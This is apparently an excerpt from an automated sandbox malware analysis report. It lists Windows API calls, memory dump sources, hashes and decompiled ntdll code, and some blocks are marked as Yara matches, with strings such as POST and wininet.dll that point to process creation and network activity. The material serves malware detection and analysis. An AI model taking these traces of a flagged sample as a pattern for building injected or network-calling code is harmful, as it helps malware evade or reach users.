                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 9c137e32171303a661ea0113f3c99b139025e865634e5edf9b52149bb49c7b14
                    • Instruction ID: f3852293a892711c24f47c4f21a0fd6891de9983a8a261295fa5910268262069
                    • Opcode Fuzzy Hash: 9c137e32171303a661ea0113f3c99b139025e865634e5edf9b52149bb49c7b14
                    • Instruction Fuzzy Hash: 8190027120110413F112A15985047070059D7D0285FA1C522A4415559D9696D992B261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 123e6e2610a35ffd341247ff7c4db67e3bd035993c7b11ae3861d20dc64166c9
                    • Instruction ID: cdf24cf172266a349a897aaa16731bf540c8a1cd373ce5c9e03f1a15f8775c56
                    • Opcode Fuzzy Hash: 123e6e2610a35ffd341247ff7c4db67e3bd035993c7b11ae3861d20dc64166c9
                    • Instruction Fuzzy Hash: 259002A134110443F101A1598414B060055D7E1345F61C125E5055555D8659DC927266
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 443ee4ab5265b710b2cbdac2e5578b6f99271512b89a62dd46542b68b5b38f1a
                    • Instruction ID: ad985d7ec074aff7f6f95c97514cc87659f208d5a8052c9a9a2aaa4048048580
                    • Opcode Fuzzy Hash: 443ee4ab5265b710b2cbdac2e5578b6f99271512b89a62dd46542b68b5b38f1a
                    • Instruction Fuzzy Hash: C69002A1202100036106B1598414616405AD7E0245B61C131E5005591DC565D8D17265
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c0174bba570a21cfb926b6dc4fcc97aff31e33f78c16b74876eb8457ab81f7cb
                    • Instruction ID: 51c1c2c80f079b5a4eb33599d0eea781437d4d23fb3f24968c7d26255cdab597
                    • Opcode Fuzzy Hash: c0174bba570a21cfb926b6dc4fcc97aff31e33f78c16b74876eb8457ab81f7cb
                    • Instruction Fuzzy Hash: 2F9002B120110403F141B15984047460055D7D0345F61C121A9055555E8699DDD577A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7e8ab1b0f125b9a8c0bc580017313e6cf042c6f5ecd2970cba45f9546ed84f13
                    • Instruction ID: 08206ddabb80e2a15f03583f89ee6cbd36d6a181945b0da869421095617b4791
                    • Opcode Fuzzy Hash: 7e8ab1b0f125b9a8c0bc580017313e6cf042c6f5ecd2970cba45f9546ed84f13
                    • Instruction Fuzzy Hash: 9F900265211100032106E55947045070096D7D5395361C131F5006551CD661D8A16261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7b2ac1870162b4af706d5286d4818bf81c11b1178d0ea60c12eed28ac6441f3d
                    • Instruction ID: 251824873494dc26601b12a0950dbbbfa1b0f9e96fff353050aebf6eddcd187a
                    • Opcode Fuzzy Hash: 7b2ac1870162b4af706d5286d4818bf81c11b1178d0ea60c12eed28ac6441f3d
                    • Instruction Fuzzy Hash: 2F90027120110843F101A1598404B460055D7E0345F61C126A4115655D8655D8917661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 571c4cce36f1d2fe264bc5f122d1b44997803d61b143a79a5e8a361b174ccf89
                    • Instruction ID: bdc84eb22028c0b31cc4170baec6d571df5189836c7a331529c3b36e0cdaa3b4
                    • Opcode Fuzzy Hash: 571c4cce36f1d2fe264bc5f122d1b44997803d61b143a79a5e8a361b174ccf89
                    • Instruction Fuzzy Hash: B790027120118803F111A159C40474A0055D7D0345F65C521A8415659D86D5D8D17261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 5638398a595694bdc8944b00ac629a7ba9f49cffdb6387d80a93eb188f4a9967
                    • Instruction ID: 849d81a2087d660230ca965395df71413cb6d9abf70c33de06207afcba5e3560
                    • Opcode Fuzzy Hash: 5638398a595694bdc8944b00ac629a7ba9f49cffdb6387d80a93eb188f4a9967
                    • Instruction Fuzzy Hash: DD90026121190043F201A5698C14B070055D7D0347F61C225A4145555CC955D8A16661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 91e42525d63f69012f566c10c90ab3c5b66d3e5751b60d86c828de6f57f5dbcb
                    • Instruction ID: f14acf949a1c67d54b389c96bb5ebba9086f60745274fcbbdf559e14293357d0
                    • Opcode Fuzzy Hash: 91e42525d63f69012f566c10c90ab3c5b66d3e5751b60d86c828de6f57f5dbcb
                    • Instruction Fuzzy Hash: 5090027120514843F141B1598404A460065D7D0349F61C121A4055695D9665DD95B7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 428324637773fe422f8e0c3158abe9633f695f4dcad19ccae0f4d518e65edb4f
                    • Instruction ID: f477d9ea2edfdd041adb6de88183c28b4f23c9a85091530434325d78dc0c0dc0
                    • Opcode Fuzzy Hash: 428324637773fe422f8e0c3158abe9633f695f4dcad19ccae0f4d518e65edb4f
                    • Instruction Fuzzy Hash: 2190027120110803F181B159840464A0055D7D1345FA1C125A4016655DCA55DA9977E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: f2a3e8040df23f2db711be3d8a69eaebf0a89be31d02ca9aaa1a5970d8510f3f
                    • Instruction ID: 7ef0a04642cedd6e161cec63c72a95f1cb8a906a8fc53e29544facd56ca4146d
                    • Opcode Fuzzy Hash: f2a3e8040df23f2db711be3d8a69eaebf0a89be31d02ca9aaa1a5970d8510f3f
                    • Instruction Fuzzy Hash: D190026921310003F181B159940860A0055D7D1246FA1D525A4006559CC955D8A96361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2ff817b57df89ae59a89acd0729a5c8ab2d13207bbf205002a1e9470b12fe301
                    • Instruction ID: 7cc4b2bb4ec486d5d8b0af6adca346635d971e63e0c5e4d139ede5bb177491e3
                    • Opcode Fuzzy Hash: 2ff817b57df89ae59a89acd0729a5c8ab2d13207bbf205002a1e9470b12fe301
                    • Instruction Fuzzy Hash: B290027131124403F111A159C4047060055D7D1245F61C521A4815559D86D5D8D17262
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2b5c949ccf6d4218bd6566fb872276ac781f342630ad7487395c76a7a06b81aa
                    • Instruction ID: 7c6129550f70f8483f2c74a18a14a99c24142283ba55cdca4b535200cbcfbcf4
                    • Opcode Fuzzy Hash: 2b5c949ccf6d4218bd6566fb872276ac781f342630ad7487395c76a7a06b81aa
                    • Instruction Fuzzy Hash: 6E90027120110403F101A59994086460055D7E0345F61D121A9015556EC6A5D8D17271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00719128
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: POST$net.dll$wininet.dll
                    • API String ID: 3472027048-3140911592
                    • Opcode ID: 21503c2815ffec126fad4fa22fe696a6e5cf4123ad9a1f4ad1931ad061aa9901
                    • Instruction ID: 0f4d8f4cc7f4af599351b9e77cde029e7ee49b42e7ccabd4e91a79eb1b798dd4
                    • Opcode Fuzzy Hash: 21503c2815ffec126fad4fa22fe696a6e5cf4123ad9a1f4ad1931ad061aa9901
                    • Instruction Fuzzy Hash: 603105B2500205FBD714DF68C889BEBB7B8FF48704F108119FA2D5B281D778A995CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00719128
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: a77418eb90fed03aa7c14b10b3b0bd65db0ada577fe5392f405e5ce4b993d58d
                    • Instruction ID: fc29a015b66a2a6a1ab9cc3ad29fc9e22b662a1158e27433a40e6a820193e322
                    • Opcode Fuzzy Hash: a77418eb90fed03aa7c14b10b3b0bd65db0ada577fe5392f405e5ce4b993d58d
                    • Instruction Fuzzy Hash: D631B2B2500345FBC714DF68C889FA7B7B9FB48B00F10851DF62A5B285D634B690CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0071A734
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID: .qP
                    • API String ID: 2186235152-829528964
                    • Opcode ID: c81224339e75ab53635f4ff4be2a4b8e319ad2baa13f8d9a8a23c9844943465f
                    • Instruction ID: 74a4c1dc51f015881951007d93fbd34281232cdedc3c60a73a5399fe23fa6628
                    • Opcode Fuzzy Hash: c81224339e75ab53635f4ff4be2a4b8e319ad2baa13f8d9a8a23c9844943465f
                    • Instruction Fuzzy Hash: F8118EB5205248BFDB14DF98DC81DE777ACEF88724F14829AF94C8B246C534E855CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00703AF8), ref: 0071A69D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction ID: 41cc9e616e74eae14af32a8c54f83710cb713958fde3b277435bf85a0bd9d986
                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction Fuzzy Hash: 5BE01AB1200208ABD714DF59CC49EA777ACEF88750F118554B90857241C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(6Eq,?,00714CAF,00714CAF,?,00714536,?,?,?,?,?,00000000,00000000,?), ref: 0071A65D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6Eq
                    • API String ID: 1279760036-1974188762
                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction ID: ffa65bc336d7caae1fa1e0e264671a160e33d3ccc928e233ed5e841b8b0f2631
                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction Fuzzy Hash: 05E012B1200208ABDB14EF99CC45EA777ACEF88664F118558BA085B282C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0070836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0070838B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: 5f402ef30ff872db9391dafd90e07617a7bfdda7e2d4461ac7fadc8f762b377b
                    • Instruction ID: e986020a2c8a5e5fb8354090e71d9e5a7d139c0e15956656078b1a55add45d48
                    • Opcode Fuzzy Hash: 5f402ef30ff872db9391dafd90e07617a7bfdda7e2d4461ac7fadc8f762b377b
                    • Instruction Fuzzy Hash: CF01DB31980328F7E721A6949C46FFE77686F40B90F044248FF04BB1C2D698690647E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0070836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0070838B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction ID: 467849cb9dc17daad0e9b8c027fd97f7590967642f8f79d549ea52db9dadecac
                    • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction Fuzzy Hash: AF01A731A80328F7E721A6949C47FFE776C5B40F50F054214FF04BA1C2EAD8690546F6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0070AD62
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: 8d3a0f66cbcb94614f885e292d79eb6d61490c6b700c26529869882ac0c3e71b
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: E6015EB5E0020DFBDF10DBE4DC46FEDB3B89B14308F004695A90897281F634EB448B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00708D14,?), ref: 0070F6FB
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 4122df8dead49c64f1156d70ec1abdf76d6893d67eeb1b1fee6585eae0c3ad26
                    • Instruction ID: 46ca0f24a91aec375d85ae4590d559191250d12b15c307565ea24b045ec61980
                    • Opcode Fuzzy Hash: 4122df8dead49c64f1156d70ec1abdf76d6893d67eeb1b1fee6585eae0c3ad26
                    • Instruction Fuzzy Hash: AB018871A4020CAAEB20EBA4DC86FEA73A8AF54B10F044694F908971C3D7B499C58791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0071A734
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction ID: c2efde9618a2c8b2d70dd091125b021300094815cdaa75941565f2b5f1711a6c
                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction Fuzzy Hash: 3F01AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0071A734
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 65430b4bcd81f8e4a1f34887c09f54abf117a2fedab366dd768bbf62a6493fde
                    • Instruction ID: 79ff7dbfd574563fe578179583543840ccf595450dbae1f395a36112bcb5e63b
                    • Opcode Fuzzy Hash: 65430b4bcd81f8e4a1f34887c09f54abf117a2fedab366dd768bbf62a6493fde
                    • Instruction Fuzzy Hash: 0701ABB2200108BFCB58CF89DC80EEB37ADAF8C754F158258BA0DE7240C630E851CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0070F050,?,?,00000000), ref: 007191EC
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
                    • Instruction ID: e9c33b9279335dbd46047a2cbbc87680083c234b77cda2f5c69e3faca1f63e97
                    • Opcode Fuzzy Hash: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
                    • Instruction Fuzzy Hash: A1E06D773903043AE320659DAC02FE7B29C9B81B20F140026FB0DEA2C1D999F88142A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0070F1D2,0070F1D2,?,00000000,?,?), ref: 0071A800
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 19fea9491f50e488765742f420a6f4cf67f724ee41bc20e91e9c64c2348761ea
                    • Instruction ID: e78acd6007cd6dc8112122ad9e9ce359af18daf8c4529ebbac18b8606510b5ae
                    • Opcode Fuzzy Hash: 19fea9491f50e488765742f420a6f4cf67f724ee41bc20e91e9c64c2348761ea
                    • Instruction Fuzzy Hash: 4FF05EB62102087BDB10EF99DC81EE773ADEF88720F108559FD0C97281C535E9018BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0070F1D2,0070F1D2,?,00000000,?,?), ref: 0071A800
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction ID: a59380fd0bd120555cd7eed35a651cfb8d1aeaa441a93e7cb9f1c269fbb775f7
                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction Fuzzy Hash: 97E01AB1200208ABDB10DF49CC85EE737ADEF88650F118154BA0C57241C934E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00708D14,?), ref: 0070F6FB
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction ID: 7e01860f83255627840df05937419826bcdb3004c6f52d4f931ec9e7b899fc48
                    • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction Fuzzy Hash: E6D0A7757503087BE710FAA89C07F6632CC6B44B00F490074F948DB3C3DD54F4004165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: f9c914d67c801e9ecf58411f6395d0b4241e5d32e76c4210bf75ca0cd281c80c
                    • Instruction ID: 4159f8e0b77cd3c2e9be92d6a93eb7d9132a987a5b3297904f12f5d3e213580b
                    • Opcode Fuzzy Hash: f9c914d67c801e9ecf58411f6395d0b4241e5d32e76c4210bf75ca0cd281c80c
                    • Instruction Fuzzy Hash: B4B09BB19425C5C6F751D7708608B177954B7D0745F26C175D1020641A4778D0D1F6B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    C-Code - Quality: 53%
                    			E0499FDDA(intOrPtr* __edx, intOrPtr _a4) {
                    				void* _t7;
                    				intOrPtr _t9;
                    				intOrPtr _t10;
                    				intOrPtr* _t12;
                    				intOrPtr* _t13;
                    				intOrPtr _t14;
                    				intOrPtr* _t15;
                    
                    				_t13 = __edx;
                    				_push(_a4);
                    				_t14 =  *[fs:0x18];
                    				_t15 = _t12;
                    				_t7 = E0494CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                    				_push(_t13);
                    				E04995720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                    				_t9 =  *_t15;
                    				if(_t9 == 0xffffffff) {
                    					_t10 = 0;
                    				} else {
                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                    				}
                    				_push(_t10);
                    				_push(_t15);
                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                    				return E04995720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                    			}











                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0499FDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0499FE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0499FE01
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: ab3239b643f59fde70cb301c21bb8c76259005d2a0c43f742751511d9ada110d
                    • Instruction ID: 44890b2951533b62b7e173179b2f513ec42b8732beee4e416d0d00f70c955994
                    • Opcode Fuzzy Hash: ab3239b643f59fde70cb301c21bb8c76259005d2a0c43f742751511d9ada110d
                    • Instruction Fuzzy Hash: CAF0F632240201BFEA211A89DC06F23BB9AEB84734F150724F628965D1EA62FD60D7F4
                    Uniqueness

                    Uniqueness Score: -1.00%